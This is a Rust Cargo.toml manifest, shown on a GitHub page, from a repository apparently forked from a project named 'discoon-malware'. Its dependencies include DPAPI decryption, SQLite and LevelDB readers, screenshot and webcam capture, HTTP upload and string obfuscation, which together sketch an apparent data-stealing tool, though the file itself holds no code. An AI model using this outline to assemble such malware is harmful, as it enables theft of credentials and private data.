forked from kkirta/discoon-malware
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCargo.toml
32 lines (29 loc) · 1009 Bytes
/
Cargo.toml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
[package]
name = "discoon"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[profile.release]
opt-level = "z" # Optimize for size.
lto = "fat" # Enable Link Time Optimization
codegen-units = 1 # Reduce number of codegen units to increase optimizations.
panic = "abort" # Abort on panic
strip = "symbols" # Strip symbols from binary
[dependencies]
walkdir = "2.3.2"
sysinfo = "0.25.1"
serde_json = "1.0.83"
winapi = { version = "0.3.9", features = ["dpapi"] }
base64 = "0.13.0"
rusqlite = { version = "0.28.0", features = ["bundled"] }
uuid = { version = "1.1.2", features = ["v4"] }
aes-gcm = "0.10.1"
reqwest = { version = "0.11.11", features = ["blocking", "multipart"] }
screenshots = "0.4.3"
nokhwa = { version = "0.9.4", features = ["input-msmf"] }
image = { version = "0.24.3", default-features = false }
wmi = "0.11.0"
rs-leveldb = "0.1.5"
gethostname = "0.2.3"
winreg = "0.10.1"
obfstr = "0.4.1"